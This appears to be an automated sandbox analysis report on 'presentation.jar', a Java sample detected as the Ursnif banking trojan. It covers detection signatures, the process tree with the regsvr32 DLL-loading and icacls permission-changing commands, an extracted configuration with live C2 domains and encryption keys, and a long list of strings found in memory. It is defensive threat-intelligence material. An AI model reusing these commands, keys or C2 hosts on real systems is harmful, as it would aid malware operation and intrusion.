Play interactive tour

Edit tour

Analysis Report presentation.jar

Overview

General Information

Sample Name:	presentation.jar
Analysis ID:	406076
MD5:	6c5e7908c3a06aafd6dcebc8a2dcb674
SHA1:	d094aef9d24e13ab70f2ef767242be554ed855ae
SHA256:	cb8b20c28a0ac697b6f5bd430bd86762f6b9ef635428fe3fe77e174b172ac6f4
Infos:
Most interesting Screenshot:

Detection

Ursnif

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected Ursnif

Exploit detected, runtime environment dropped PE file

Exploit detected, runtime environment starts unknown processes

Abnormal high CPU Usage

Contains capabilities to detect virtual machines

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Registers a DLL

Sample execution stops while process was sleeping (likely an evasion)

Tries to load missing DLLs

Uses cacls to modify the permissions of files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

cmd.exe (PID: 6008 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

java.exe (PID: 5732 cmdline: 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar' MD5: 28733BA8C383E865338638DF5196E6FE)

icacls.exe (PID: 3160 cmdline: C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M MD5: FF0D1D4317A44C951240FAE75075D501)

conhost.exe (PID: 2168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

iexplore.exe (PID: 4812 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/ MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)

iexplore.exe (PID: 6028 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)

regsvr32.exe (PID: 6560 cmdline: regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "C6HtybW6gOadm/yj7zZMo6G6KXFQ4dEp7zHfMW5IRELO0uvqi07MPT6/x9S6litknH+BvSY8WUJSCe++K06Znqzju0G9p4s7vFCRkOmz8D6jF964Fzsv95HaHsXi47+U2GiQ2Gikw0inkLSb2F3I2SWzZYUSFyC2M/2JSO9/RfzN4fQovVmdO23GnRaRT7RQ80xdzZmG/1KSXrPdpz6L0pheEWvnVtXAtJsxn0oJ2Av+YPARe6ceA0vZDing87oj0OaTGGHfCE60e2J7m50kPk40R/wZ5kCD/nJn2jktSyio6o+GuLZKR/fZyVreMHafB6O7UghEGnsrn77tN0EAJaA+F5jMamer1uRrqfAyszw=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "2500", "server": "580", "serpent_key": "ZihFTxUSedu9uCzM", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
10.3.regsvr32.exe.3208d23.0.raw.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security
10.2.regsvr32.exe.4d70000.2.unpack	JoeSecurity_Ursnif_1	Yara detected Ursnif	Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 10.3.regsvr32.exe.3208d23.0.raw.unpack

Malware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "C6HtybW6gOadm/yj7zZMo6G6KXFQ4dEp7zHfMW5IRELO0uvqi07MPT6/x9S6litknH+BvSY8WUJSCe++K06Znqzju0G9p4s7vFCRkOmz8D6jF964Fzsv95HaHsXi47+U2GiQ2Gikw0inkLSb2F3I2SWzZYUSFyC2M/2JSO9/RfzN4fQovVmdO23GnRaRT7RQ80xdzZmG/1KSXrPdpz6L0pheEWvnVtXAtJsxn0oJ2Av+YPARe6ceA0vZDing87oj0OaTGGHfCE60e2J7m50kPk40R/wZ5kCD/nJn2jktSyio6o+GuLZKR/fZyVreMHafB6O7UghEGnsrn77tN0EAJaA+F5jMamer1uRrqfAyszw=", "c2_domain": ["app.buboleinov.com", "chat.veminiare.com", "chat.billionady.com", "app3.maintorna.com"], "botnet": "2500", "server": "580", "serpent_key": "ZihFTxUSedu9uCzM", "sleep_time": "10", "SetWaitableTimer_value": "10"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\broker.dll

ReversingLabs: Detection: 27%

Multi AV Scanner detection for submitted file

Show sources

Source: presentation.jar	Virustotal: Detection: 19%			Perma Link
Source: presentation.jar	ReversingLabs: Detection: 41%

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.249.219:443 -> 192.168.2.3:49735 version: TLS 1.2

Source:

Binary string: c:\119\Minute\Force_Lead\Apple\oil.pdb source: regsvr32.exe, 0000000A.00000002.477390271.0000000004DA4000.00000002.00020000.sdmp, broker.dll.2.dr

Software Vulnerabilities:

Exploit detected, runtime environment starts unknown processes

Show sources

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Process created: C:\Program Files\internet explorer\iexplore.exe

Source: Joe Sandbox View	IP Address: 34.202.206.65 34.202.206.65
Source: Joe Sandbox View	IP Address: 35.181.18.61 35.181.18.61

Source: Joe Sandbox View	JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: Joe Sandbox View	JA3 fingerprint: d2935c58fe676744fecc8614ee5356c7

Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x1d5bee6a,0x01d742dc</date><accdate>0x1d5bee6a,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d60b326,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.7.dr	String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x1d60b326,0x01d742dc</date><accdate>0x1d63157d,0x01d742dc</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)

Source: unknown

DNS traffic detected: queries for: www.java.com

Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: java.exe, 00000002.00000002.257518296.0000000016740000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: java.exe, 00000002.00000002.251400043.000000000A1C5000.00000004.00000001.sdmp	String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: 0D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm.8.dr	String found in binary or memory: http://bugs.webkit.org/show_bug.cgi?id=3810
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: notice[1].js0.8.dr	String found in binary or memory: http://consent-pref.trustarc.com/?type=oracle6
Source: notice[1].js0.8.dr	String found in binary or memory: http://consent.trustarc.com/
Source: notice[1].js0.8.dr	String found in binary or memory: http://consent.trustarc.com/bannermsg?
Source: notice[1].js0.8.dr	String found in binary or memory: http://consent.trustarc.com/noticemsg?
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org
Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmp	String found in binary or memory: http://cps.letsencrypt.org0
Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp, java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org
Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org;
Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.orgC
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl
Source: java.exe, 00000002.00000002.253730182.00000000151A9000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: java.exe, 00000002.00000002.253730182.00000000151A9000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: java.exe, 00000002.00000002.252170315.000000000A367000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl
Source: java.exe, 00000002.00000002.252170315.000000000A367000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl
Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: renderer[1].js.8.dr	String found in binary or memory: http://github.com/requirejs/text/LICENSE
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: get[1].js.8.dr	String found in binary or memory: http://inforoom.truste.com
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: java.exe, 00000002.00000002.251436069.000000000A1D5000.00000004.00000001.sdmp	String found in binary or memory: http://java.oracle.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: java.exe, 00000002.00000003.230125961.0000000015AE4000.00000004.00000001.sdmp, java.exe, 00000002.00000003.229309948.0000000015298000.00000004.00000001.sdmp, java.exe, 00000002.00000002.252170315.000000000A367000.00000004.00000001.sdmp	String found in binary or memory: http://null.oracle.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com
Source: java.exe, 00000002.00000002.253730182.00000000151A9000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://ocsp.comodoca.com0
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.sectigo.com
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: http://ocsp.sectigo.com0
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: render[1].js0.8.dr	String found in binary or memory: http://oss.oracle.com/licenses/upl.
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: 1.cache[1].js.8.dr	String found in binary or memory: http://ph-truste-stage.truste-svc.net/js/cookie_iframe.html
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://policy.camerfirma.com0
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/
Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/0
Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/S
Source: java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmp	String found in binary or memory: http://r3.i.lencr.org/k
Source: java.exe, 00000002.00000002.253067273.000000000A626000.00000004.00000001.sdmp, java.exe, 00000002.00000002.250716526.0000000005079000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org
Source: java.exe, 00000002.00000002.250698316.0000000005073000.00000004.00000001.sdmp	String found in binary or memory: http://r3.o.lencr.org0
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: http://repository.swisssign.com/0
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
